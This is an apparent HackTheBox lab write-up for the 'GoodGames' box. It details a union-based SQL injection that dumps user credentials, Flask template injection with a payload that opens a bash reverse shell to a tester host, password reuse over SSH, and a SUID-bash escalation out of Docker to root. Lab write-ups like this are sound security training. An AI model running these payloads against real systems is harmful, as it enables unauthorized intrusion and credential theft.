GoodGames
An easy Linux box from HackTheBox with a lot of steps, using SQLi and SSTI for initial access, then having to escape a docker container and incorrect binary permissions to get root.
GoodGames
Recon
Running the default nmap on all ports
Nmap scan report for 10.10.11.130
Host is up (0.038s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51
Service Info: Host: goodgames.htb
Add goodgames.htb into /etc/hosts, and all we find is a HTTP server on port 80
Find a registration and login form, and find that the email parameter is injectable on the login request - and the email is reflected in the response with a welcome message, so can easily check if the response includes the
Exploitation
Enumerate the columns by injecting
email={injection}
Starting with
email=' union select 1,2,etc-- -
And increasing the amount each time, 1,2,3,4 works and returns “Welcome 4” in the response
The other values don’t return any “Welcome message”, but when you specify 4 columns with
email=' union select 1,2,3,4-- -
Returns a sucessful login page with “Welcome 4” - so you know there are 4 columns
Further enumerating for database name
email=' union select 1,2,3,database()-- -
And find that the welcome message on the login returns “Welcome main”, so main is one of the databases
The full list of databases can be found with
email=' union select 1,2,3,concat(schema_name, ':') from information_schema.schemata-- -
Which logs in with “Welcome information_schema:main”, there are only 2
Enumerating all of the tables within main
email=' union select 1,2,3,concat(table_name, ':') from information_schema.tables where table_schema = 'main'-- -
Find that there are 3 tables “Welcome blog:blog_comments:user:”
The “user” table seems the most interesting, we can extract all the columns in user with
email=' union select 1,2,3,concat(column_name, ':') from information_schema.columns where table_name = 'user'-- -
Can see there are 4 columns, id, email, password and name
Now to extract all of the information in email and password with
email=' union select 1,2,3,concat(name, ':', email, ':', password, ':') from user-- -
Find all the dumped data and an admin login, but the password seems encrypted
admin:admin@goodgames.htb:2b22337f218b2d82dfc3b6f77e7cb8ec:
Hash is identified as MD5, searching for it on an online database, MD5.gromweb.com returns that the plaintext password is
superadministrator
Then we can login to the site with email: admin@goodgames.htb and password: superadministrator
When logged in you can see an extra option to go to an administrator control panel, mentioning Flask - the python backend server library
You can login with the same creds used, admin with superadministrator
On the dashboard you can find your profile, and it’s vulnerable to template injection - testing the full name with {{7x7}} it evaluates to 49 on the page
Now can leverage the SSTI to get shell, first with a “pwd” POC
{{config.__class__.__init__.__globals__['os'].popen('pwd').read()}}
Can see that it works, can execute arbitrary commands
Now using this command with a reverse shell
{{request.application.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/10.10.14.6/9000 0>&1"').read()}}
With the reverse shell it’s clear that its a docker container, linpeas detects it as docker as well
There isn’t a possibility of escaping the container normally because it’s not a priveledged container
But there is another user, called augustus
Lets try to ssh in as augustus, but first need to figure out his IP
With ifconfig, ip of the container is 172.19.0.2, can do a ping sweep of the class C networks with the bash command
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
Find another host on 172.19.0.1 - probably the main host
Now can ssh with
ssh augustus@172.19.0.1
With the password of “superadministrator”
And it works
However we don’t have root yet, but notice that the files created by the docker container are owned by root - the container really has root priveledges but no way to interact with the box besides files
Knowing that the container can see and modify the home directory files of augustus we can copy /bin/bash into augustus home directory, then go back to the container and execute
chown root:root ./bash
chmod 4777 ./bash
Then going back to augustus ssh, and executing
./bash -p
To get root
The -p flag is very important because it allows bash to run as root instead of augustus - ignoring the $ENV variables and taking the variables of ./bash